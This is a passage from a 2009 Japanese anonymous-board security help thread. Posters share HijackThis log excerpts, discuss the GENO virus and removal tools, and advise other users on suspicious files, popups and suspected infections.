O9 - Extra 'Tools' menuitem: Sun の Java コンソール - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - URLリンク(update.microsoft.com)
O23 - Service: a-squared Free Service (a2free) - Emsi Software GmbH - C:\program files\a2 free\a2service.exe
O23 - Service: AntiVir PersonalEdition Classic Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
End of file
759:名無しさん@お腹いっぱい。
09/04/08 13:37:36
GENOのマルウェアってどこもまだ駆除できないの?
フリーセキュリティは最新のものには強いと聞いてたんだけど..
バスターやノートンとかの御三家も無理かな?
760:名無しさん@お腹いっぱい。
09/04/08 15:13:41
無理っす
761:名無しさん@お腹いっぱい。
09/04/08 15:21:02
手動でOK
762:名無しさん@お腹いっぱい。
09/04/08 15:35:47
>>756
ぱっと見、怪しいのは無いけど
Adobe Reader 9.1.0.163
Jre 1.6.0_13
が最新だから入れとけ
763:名無しさん@お腹いっぱい。
09/04/08 15:52:12
GENO ウイルス に一致する日本語のページ 約 42,800 件中 1 - 50 件目 (0.18 秒)
URLリンク(www.google.com)
764:名無しさん@お腹いっぱい。
09/04/08 15:55:17
GENO ウイルスってAdobe Readerの脆弱性をついてくると聞きました。
ですが、もしAdobe Readerをアンインストールしていた場合はどうなるのでしょうか?
765:名無しさん@お腹いっぱい。
09/04/08 15:57:16
スレリンク(sec板:27番)
766:名無しさん@お腹いっぱい。
09/04/08 16:18:37
"GENOウイルス"の検索結果 36 件中 1 - 36 件目 (0.14 秒)
767:名無しさん@お腹いっぱい。
09/04/08 16:25:46
GENO ウイルス ニュース検索結果
URLリンク(news.google.co.jp)
768:名無しさん@お腹いっぱい。
09/04/08 16:41:01
先日お世話になった>>690です。その節はありがとうございました。
特に変わったことはなかったのですが念のためにリカバリしました。
スッキリしたと思っていたのですが、ユーザー/appdata/local/Temp/ose00000.exe
なるものが気になっています。これだけ2006年10月の日付になっています。
vistaでofficeパーソナルを持っていると付いてくるものなのでしょうか?
ググってみましたが、日本語の情報がなくて一般サイトはしばらく踏む勇気がないので
調べられませんでした。
769:名無しさん@お腹いっぱい。
09/04/08 17:15:51
>>768
office2007なら考えられないこともないそーですが
ご心配ならそのファイルのコピーを作って、
VirusTotalで検査してみてください
770: ◆N9P3SuvBPo
09/04/08 17:21:23
>758
ログに感染と見られるものはないですが、一つだけ以下のエントリーをHijackThisでFIXして下さい。
>O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
(HJTには何も無しか…とはいえ大丈夫と判断下しても良いのだろうか…)
>768
リカバリした直後なら、問題なし。
771: ◆N9P3SuvBPo
09/04/08 17:42:11
ComboFixを奨めようかと考えていたんですが、この板のGENOウイルススレの11に
こんなカキコがあった。
>ただComboFixで自動処理するとアカウントにログイン出来なくなる
>(正規ファイルを悪玉ファイルに上書き→ComboFixが処理?)
アカウントにログイン出来なくなる
このことから、winlogon.exeあるいはuserinit.exeが改ざんされてると思われる。
再起動時のブルースクリーンのエラーメッセージさえ分かれば…
stop : c000021a Unknown Hard Error
とかならwinlogon.exeの修復を行なえば良いのだが。
あと、HJTもRSITでも見つからない
SDFixも駄目
レジストリエディタの起動も阻止
772:名無しさん@お腹いっぱい。
09/04/08 18:31:24
究極のセキュリティ対策
『 キャッシュをクリア(サッ 』
(やったー!カッコイイ!!!)
773:名無しさん@お腹いっぱい。
09/04/08 18:32:44
( ̄▽ ̄ ;)ハァ。。。。
774:インスコマン
09/04/08 18:55:44
>>771
>winlogon.exeあるいはuserinit.exe
それ疑って感染前のuserinit、winlogonのMD5取って
感染後と比較しても変わってなかった。
一回ComboFixで処置、再起動でログインできなくなって
回復コンソールでuserinit、kernel32.dll類を復元してみたけど
回復しなかったから別のところに問題があるのかも・・・(いまだにわからん)
775: ◆N9P3SuvBPo
09/04/08 19:30:14
>774
そっち疑ってみたんすけど、違うみたいでしたか。
俺の環境では感染しないので分からないのだけど、ニュー速のほうで、
再起動時にブルスクになると書いてあったから、stopエラーかな?
と思ったんだがそれも違うんですよね?
776:インスコマン
09/04/08 19:54:10
>>775
>再起動時にブルスクになると書いてあったから
それ初めて知ったw
ブルスクはよくわららんですw
777:インスコマン
09/04/08 19:55:05
ちなみに自分の環境じゃGENOウイルスでブルスクになったことはまだない
778: ◆N9P3SuvBPo
09/04/08 20:01:33
>776
ブルスクはあくまでもニュー速スレの情報ですし
(ブルスクは環境に寄りけりと言ったところか…)
ログイン出来なくなった時はどんな状態になったんですか?
779:名無しさん@お腹いっぱい。
09/04/08 20:26:47
>>769>>770
どうもありがとうございます。office2007です。
virus totalにも行ってみたところ結果は0/40(0.00%)とありました。
ただの残骸のようなので普通に削除しようかと思います。
780:名無しさん@お腹いっぱい。
09/04/08 21:02:08
/)
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ キャッシュ削除すりゃぁいいんだよ!!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
781:名無しさん@お腹いっぱい。
09/04/08 21:09:18
ブルマスク水
782:インスコマン
09/04/09 02:11:28
>>778
壁紙だけ表示されて即ユーザー選択画面へ・・・
783: ◆N9P3SuvBPo
09/04/09 03:25:15
>>782
つまり…
起動→ようこそ画面→デスクトップの表示→ユーザー選択画面ってとこ?
強制的にログオフさせられているって感じのようですが…
それだったらログオンに関係するファイルがやられてる、としか…
でもログオン関係のファイルの修復しても復帰できなかったと言ってましたし、
原因は別だろうね。
ちなみに、俺一度こんな実験をやったことあります。
コンパネ→管理ツール→ローカルセキュリティポリシー
この中のどこかに「ローカル ログオン」というのがあって、
これを無効にして再起動したら、ログオンできなくなってしまい
リカバリーしました。
784:名無しさん@お腹いっぱい。
09/04/09 07:03:12
GENOウイルスの専門掲示板建てました
情報提供にご協力願います。
GENOウイルス被害者の会
URLリンク(yy701.60.kg)
785:名無しさん@お腹いっぱい。
09/04/09 07:12:59
ボットに感染してるかどうか
サイバークリーンってとこの駆除ツールを実行してみた方がいいんですかね?
OCNからの定期メールで やってみな みたいなこと書いてあったんですが・・・
786:名無しさん@お腹いっぱい。
09/04/09 07:53:37
そこはバスター、ゾンビがいるぞw
787:名無しさん@お腹いっぱい。
09/04/09 08:24:32
>>786
ゾンビ?
やらない方がいいんですか?
788:名無しさん@お腹いっぱい。
09/04/09 08:41:57
>>785
HDD内の全ファイル名をテキスト化して
つこうたで定評のあるIPAに送信する愉快なツールだぞ、あれは
789:名無しさん@お腹いっぱい。
09/04/09 09:49:24
>>788
まじっすか?
ここで聞いといてよかったです
790:名無しさん@お腹いっぱい。
09/04/09 10:27:30
GENOウイルスやべえな
791:名無しさん@お腹いっぱい。
09/04/09 12:29:43
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★11
スレリンク(news板)
792:名無しさん@お腹いっぱい。
09/04/09 15:10:41
【使用OS】 「XPProSP3」
【Microsoft Update(MU)の状態】 「つながりません」
【使用セキュリティソフトとバージョン】 「Norton Internet Security 2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Ad-Aware SE」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「なし」
どうやらウィルスに感染してしまったようでPCを立ち上げたとき、または一定時間ごとに、
メールを大量に送付してしまいます。
ウィルススキャンをして感染ファイルを削除したため今は収まっていますが、
当初はservices.exeが終了して再起動してしまいました。
今はウィルスは検出されていませんがレジストリが改変されてしまったようで、
メールを大量に送付し続けています。(メールはプロバイダがブロックして送信されていないようです。)
対策をご存知の方がいらっしゃいましたら宜しくお願いします。
793:八頭 ◆YAGApwSaEw
09/04/09 16:45:07
>>792
DDS
URLリンク(www.forospyware.com)
dds.scr(MS-DOS アプリケーション)をデスクトップにダウンロード
DDSを実行・・・
DDSによるログ抽出が済むまで操作はありません URLリンク(i39.tinypic.com)
ログ抽出走査が完了すると「DDS - How to post the logs(投稿時の注意点)」のダイアログ表示はOKで閉じます
自動的にDDS.txt とAttach.txt の2つがメモ帳で開くので、
ファイル(F)→「名前を付けて保存(A)」でそれぞれのログを保存しておく。(*テキスト名は変更しない)
OTViewIt
URLリンク(oldtimer.geekstogo.com)
OTViewIt.exeをデスクトップへダウンロード
OTViewItを実行
「Scan All Users」の箇所にチェックを入れてから、「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTViewIt.txt」と「Extra.txt」がメモ帳で表示されて、デスクトップ上にテキストが自動的に保存されています
これらのログテキストを新規フォルダへコピー&貼り付けしてから→フォルダを圧縮
Upload a suspected infected fileへ、[ Report ] - Infection log report (Massmail bot infection. ) として送信
スレリンク(sec板:9番) の中段
794: ◆N9P3SuvBPo
09/04/09 17:05:32
>792
リカバリしてください。
そっちのほうが手間掛からずに済みます。
795:名無しさん@お腹いっぱい。
09/04/09 18:36:11
ファイルに感染するたびにウイルス自体をランダムな
暗号化コードで暗号化するポリモーフィック型の不正プログラム
「PE_VIRUX(バイラックス)」の流通が確認されたと報告。
「PE_VIRUX」は、正規ファイル(exeファイルやscrファイル)に
感染する際に、自身のコードを追加する場所や暗号化の方式・回数を
ランダムに変更するため駆除が困難
ポリモーフィック型って複号化するロジック部分を検出すれば見つかるって
聞いたけど無理なの?
メタモーフィック型なら無理な気がするけど
796:八頭 ◆YAGApwSaEw
09/04/09 18:52:52
>>792
[ Report ]の提出が完了したら、オートラン設定を確認する
①・IPA 情報処理推進機構
●「外部記憶メディアのセキュリティ対策を再確認しよう!」 USB メモリの利用における対策
URLリンク(www.ipa.go.jp)
②・使用しているソフトウェアやWebプラグイン類の最新版Updateとセキュリティ設定を常に心掛けましょう
(*解凍ソフト、動画Player、Adobe Reader用パッチ、Mailソフト、Officeソフト、Sun MicrosystemsのJavaなど)
③「Ad-Aware SE」 は保護機能を解除してから、「プログラムの追加と削除」からアンインストールして、
次の3つとも装備すること
スレリンク(sec板:8番)
・「a-squared Free 4.0」
・「Malwarebytes' Anti-Malware 1.35」
・「Avira AntiVir Personal - FREE Antivirus, Version 8
797:名無しさん@お腹いっぱい。
09/04/09 20:19:04
>>792
ウイルス名もわからない様ではどうにも…
そんな状態のPCはネットにつないではいけない。
漏れも駆除するよりリカバリに一票。
それから、Ad-Aware SEは3月31日で定義ファイルの提供が終了してます。
Lavasoftソフトを使うならAd-Aware AE(デフォルトで日本語有り)に。
798:名無しさん@お腹いっぱい。
09/04/12 03:06:19
Kido.ih
に感染しました
msと主なセキュリティサイトに繋がりません
799:名無しさん@お腹いっぱい。
09/04/12 03:11:00
>>798
>>1★質問用テンプレ★
800:名無しさん@お腹いっぱい。
09/04/12 04:01:23
>>792
リカバリしたくないのであればさらにspybot,clamなどを推奨。非常駐で使えるものは全て使ってみて下さい。
全て試して全く引っかからないか、引っかかってもあまりにも多ければリカバリしましょう。
駆除できてもパソコンの性能はガクンと落ちてしまいます。
801:名無しさん@お腹いっぱい。
09/04/12 04:16:32
いまどきAd-AwareとかSpybotとかClamなんて
アメリカ人でも使ってないからw
802:名無しさん@お腹いっぱい。
09/04/12 05:50:47
>>800
俺は使ったことないから分からないな・・
>>801
何使ってる?おすすめあったら教えて
803:名無しさん@お腹いっぱい。
09/04/13 00:50:50
手動削除中なのだが
l.cmd
コレってウィルス? 純粋なシステムファイル?
ググッてもヤフーでググってもいまいちピンとこないんで…
804:名無しさん@お腹いっぱい。
09/04/13 08:22:12
ランダムなファイル名の奴がごろごろしているのに
ファイル名だけでわかるかボケ
バッチだからメモ帳あたりで開いて読んで判断しろ
805:名無しさん@お腹いっぱい。
09/04/14 01:44:02
こっちで質問するようすすめられた。
マルチじゃないのでよろしく
勘違いかもしれないけど国民新党のホームページ乗っ取られたの?
さっきあちこちの政党のホームページ見てたんだけど国民新党のホームページ開いたらfirefoxが強制終了した。
不思議に思ってもう一回開いたらやっぱり強制終了。
不安になったのでパソコンのウィルスチェック、問題なし・・
aguse gatewayでURLリンク(www.kokumin.or.jp)を調査、問題なし・・
一体何故なのか分からない。ちなみに他のページ見たりするのには何の問題もない
不審なソフトの動きもない
勘違いかもしれないけどもしそういう情報があったら教えて。長レスしてスマソ
806:名無しさん@お腹いっぱい。
09/04/14 03:10:41
質問です
あるサイトでファイルをダウンロードしていたら、いきなりポップアップ画面で
「あなたも○○(自宅の住所。ローマ字で)に住んでるんでしょ?」
とか出てきました。
なぜ住所がばれたのでしょうか? ウイルスですか?
ダウンロードしたファイルをウイルス検索しても、何も引っかかりませんでした
よかったらご教示ください
807:名無しさん@お腹いっぱい。
09/04/14 05:49:09
>>806
IPからどこら辺に住んでるかとかは分かるよ?でも東京とか大阪とか大雑把にしか分からんでしょ?
アクセス情報【使用中のIPアドレス確認】
URLリンク(www.cman.jp)
あとどのサイトか言ってくれなきゃ答えるにも難しい。
住所ってどのくらい正確に出てきたの?
808:名無しさん@お腹いっぱい。
09/04/14 08:16:15
ただのメッセンジャスパムだったりしてな
809:名無しさん@お腹いっぱい。
09/04/14 12:51:58
>>807
説明が足りなくてすいません
「同人こっとん」という同人誌のサイトです
「~市」まで(出てきたのは市のみです)特定されていました
ごく最近パソコンをリカバリして、ウイルスとかにはやられてないと思うのですが……
810:名無しさん@お腹いっぱい。
09/04/14 13:17:35
>>809
使ってるブラウザは何?あとポップアップは表示しないように設定してる?
aguse gatewayでググってそこにそのサイトのURLぶちこんで調査、そこで問題なければ大丈夫なはず。
あとそんなに気にするほどでもないと思う。807で述べた通り基本的にIPはどこら辺に住んでるかの情報を含む。
住んでいる番地まで出たのなら話は別だが市町村程度までならそんなもん。
心配ならPG2でも導入すべし。
便利なIPフィルタソフト、PeerGuardian2
スレリンク(pc2nanmin板)
どうしても心配ならもう一回わざと表示させて、その画面をプリントスクリーンでコピー、画像に貼ってどっかにアップしてみて。
それが一番確実。レスだけでは憶測でしか判断できん。
811:名無しさん@お腹いっぱい。
09/04/14 16:09:37
>>810
ありがとうございます
当のサイトをaguse Gatewayで見ようとしたのですが、
「画像を取得できませんでした」
というのがどのサイトを入力しても出ます
そのメッセージでぐぐってもヒットしないので、よかったら本来はどう表示されるのかを教えてもらえないでしょうか
まず、「ウェブ」で調べたところ、メインページを含めて色は変わりませんでしたが、
「ゲートウェイ」で例のポップアップ画面が出るページを張ったら色が紫になりました
こういう場合、そのサイトにいるだけでも危険ですか?
無知で申し訳ありませんが、もう少しお付き合いいただけるとうれしいです
812:名無しさん@お腹いっぱい。
09/04/14 16:38:12
>>811
安全なら緑、危険なら紫になる
一応あんたの言うページ調べたけど特に問題はないはず。入る前に幾つかのソフトで何重にもかけて調べたが問題なし
ページ情報にも悪意のあるもんは見当たらなかった。
ただ気になるのはそのポップアップ画面には一度も出くわさなかった。
firefoxでポップアップウィンドウブロックをしてるからだろうが自分から外すわけにはいかん。
手間をかけるがそのポップアップ画面が出るページのURL貼ってくれ
(みんなに迷惑かけないようポップアップ画面が出るページのURLと明示して貼ってくれ)
あといるだけで危険かと言うと、その発想には指摘すべきことがある。
そもそも今も昔もセキュリティソフトとかはパソコンに侵入されたら意外と脆いものなのだよ。
もちろん最近では少しなら侵入されても対応できるようになってるが、それ以前に侵入させないことが一番重要なわけ。
だから危険なページにいるいないじゃなくて入る前に危険かどうか判断できることが大事になるわけよ
仮に開いてしまってもページ情報を読み込ませず遮断するよう設定しておくことは必須。usercash系なんかがいい例
さっき教えたaguse gateway、これ使えばかならの割合で危険サイト回避できるし、最近のアンチウィルスソフトなら
グーグル検索の段階で危険かどうかレベル分けして表示されるはず。そういうのを利用して最初から入らないのが正しい使い方になる
aguse gatewayを教えたのもそういう対策があるよってこと
つまり危険サイトに一度はいったらすぐ出ようとずっと居座ろうとあんまり変わらん。もちろん一刻も早く出るにこしたことはないが
本当に悪意のあるサイトだったら入った時点でアウト。
ただあんんたのいうサイトはそのポップアップ画面が出るページのURL?踏まなきゃ平気だと思う。
さっきも言ったがとりあえずそのポップアップ画面が出るページのURL貼ってみて
813:名無しさん@お腹いっぱい。
09/04/14 16:54:15
いろいろとありがとうございます 助かります
ポップアップが出るURLです
URLリンク(errors.servik.com)
数秒待つと、下のほうに出てきます
ご迷惑をおかけしますが、よろしくお願いします
814:名無しさん@お腹いっぱい。
09/04/14 20:19:19
>>813アドレスでぐぐったらでてきた参考になるかは?
勇気が無くて見れない画像解説スレin半角Part526
284 :/名無しさん[1-30].jpg:2007/09/24(月) 20:54:50 ID:sPWYzFuB0
errors.servik.com/denied.htm
おねがい
288 :/名無しさん[1-30].jpg:2007/09/24(月) 21:42:19 ID:SQVwd+m+0
>>284
つまりはアダルトサイトの様です
その先は自己責任で
307 :(コテハン):2007/09/24(月) 23:32:52 ID:CJiqs2MF0
>>284
Error - Site cannot be accessed などと表示されリンクがあり
リンク先は McAfee SiteAdvisor で微妙な判定の海外の出会い系サイトに逝きます
漏れの環境ではそこまではPC無害ですが一応注意
815:名無しさん@お腹いっぱい。
09/04/14 23:43:33
>>814
確かにぐぐると出てきますね
ポップアップの画面さえクリックしなかったら大丈夫だと信じます
あと、あまり行かないようにしますね
ありがとうございました
816:名無しさん@お腹いっぱい。
09/04/15 02:23:16
質問です。
公務員志望で,公務員予備校の資料を複数の学校からweb上で取り寄せたのですが
請求したところの資料が到着してから数日後に,資料請求してない予備校からも学校案内が届きました。
これはウィルスなどの影響でしょうか。それとも個人情報漏えいされているのでしょうか。
いずれにせよ詳しくその仕組みを教えていただければ幸いです。
817:名無しさん@お腹いっぱい。
09/04/15 04:50:10
うぉお・・・
ウィルスのせいでVistaから
「お前のコンピューター、正規品じゃねーぞカス」
「もうぜってー起動してやんねーw」
とか警告が・・・orz
818:名無しさん@お腹いっぱい。
09/04/15 05:07:23
>>816
今のご時世お互いに潰しあってる場合じゃない。予備校とて同じ。一つの予備校に資料請求すれば他の予備校にも情報が伝わる。
資料請求する場合はそういうことよくある。個人情報は漏洩しませんって言っても結局は業界団体にデータとして伝わるし
どうしても気になるなら資料請求したところに電話してみな。どうにかなるわけではないが一応迷惑だって意思を伝えるのは大事なこと
819:名無しさん@お腹いっぱい。
09/04/15 05:29:07
>>813
ブラウザは火狐にすべし。
2.0の頃は重かったが3.0あかなり使いやすい。
ポップ対策にも優れている
820:名無しさん@お腹いっぱい。
09/04/15 05:45:33
>>815
それはポップアップというより広告
Adblock Plusをfirefoxで使えばいい
821:名無しさん@お腹いっぱい。
09/04/17 15:55:33
【使用OS】 XP SP3
【PCスペック】 HP compaq nx9030 メモリ1.2G
【セキュリティソフトと年式】 ウィルスバスター2009
ウィルスバスター2009の履歴を見たところPAC_Generic 001が発見され削除されていました。
webメール検索が発見され自動で削除されていました。
発見されたところを見ると
URLリンク(bosamedia.org)となっていました。
実に覚えが無いので恐らくインターネットを見てる時、どこか間違えてはいったのかもしれません。
このPAC_Generic 001をgoogleで検索したところ情報が4件しかなく情報がありませんでした。
このPAC_Generic 001とはどのようなものなのでしょうか?
お分かりの方、教えて下さい。
822:名無しさん@お腹いっぱい。
09/04/17 15:58:55
>>821
PAC_Generic 001?何だそりゃ?
こっちで聞いたら?
↓↓↓
セキュリティ初心者質問スレッドpart118
スレリンク(sec板)
823:名無しさん@お腹いっぱい。
09/04/17 17:22:17
>>821
URLリンク(www.trendmicro.co.jp)
ちなみにそのアドレスは有害。
824:名無しさん@お腹いっぱい。
09/04/17 17:25:09
>>821-823
スレリンク(sec板:281-284番)
825:名無しさん@お腹いっぱい。
09/04/17 18:39:18
>>823
一体いつそのアドレスに行ったのか全く分かりません・・
フリーソフトを探している時にどこかと間違えたのかもしれませんが・・
ちなみにどうやってそのアドレスが危険と分かったのでしょうか?
初心者ですいません
>>824
私も見てみました。破壊活動の有無がないというのは一応削除できたので大丈夫ということなのでしょうか・・
826:821
09/04/17 18:50:15
すいません。821=825です。
書き忘れて申し訳ありませんでした。
827:名無しさん@お腹いっぱい。
09/04/17 18:50:55
>>821
そこから拾ったファイルをVirustotalスキャン
URLリンク(www.virustotal.com)
黒ですね・・・
NortonSafeWebのレポート
URLリンク(safeweb.norton.com)
828:821
09/04/17 19:02:21
>>827
拾ったファイル?最近ダウンロードしたものはほぼないはずですが・・
やはりフリーソフト探している時に偽者掴まされたのかもしれません。
わざわざありがとうございました。
あとそのURLは安全でしたか?自分の質問のせいで答えてくれた方が被害にあってしまっては立つ瀬がないので・・
アクセスした瞬間感染とかするURLでしたか?
829:827
09/04/17 19:07:21
>>828
>アクセスした瞬間感染とかするURLでしたか?
とりあえず仮想環境で実験してみての結果、exeファイルをDLするページでアクセスした瞬間感染とかはない模様
あとVirustotalの結果一覧で821のファイルを検出できるベンダーはサイト開いた瞬間にブロックしてくれるのでご安心を